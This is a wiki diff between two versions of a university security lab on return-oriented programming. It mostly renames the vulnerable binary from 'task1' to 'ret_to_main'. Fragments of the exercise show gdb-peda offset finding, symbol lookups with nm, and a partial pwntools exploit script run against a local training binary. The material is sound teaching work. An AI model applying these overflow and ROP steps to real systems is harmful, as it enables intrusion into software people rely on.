Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-09 [2020/12/14 16:43] mihai.dumitru2201 [1. Return to main] |
cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
| ===== Introduction ===== | ===== Introduction ===== | ||
| Line 31: | Line 31: | ||
| All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| + | |||
| ==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
| - | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
| The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
| Line 42: | Line 43: | ||
| <code asm> | <code asm> | ||
| - | # gdb ./task1 | + | # gdb ./ret_to_main |
| gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
| 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
| gdb-peda$ r | gdb-peda$ r | ||
| - | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
| Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
| Please leave a message: | Please leave a message: | ||
| Line 110: | Line 111: | ||
| We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
| <code bash> | <code bash> | ||
| - | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | | ||
| 00000000004012b5 T main | 00000000004012b5 T main | ||
| Line 126: | Line 127: | ||
| from pwn import * | from pwn import * | ||
| - | io = process('./task1') | + | io = process('./ret_to_main') |
| # Useful values | # Useful values | ||
| Line 156: | Line 157: | ||
| <code bash> | <code bash> | ||
| # ./test.py | # ./test.py | ||
| - | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
| [*] Switching to interactive mode | [*] Switching to interactive mode | ||
| -> secret vault opened | -> secret vault opened | ||
| Line 162: | Line 163: | ||
| Please leave a message: | Please leave a message: | ||
| $ | $ | ||
| - | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
| </code> | </code> | ||
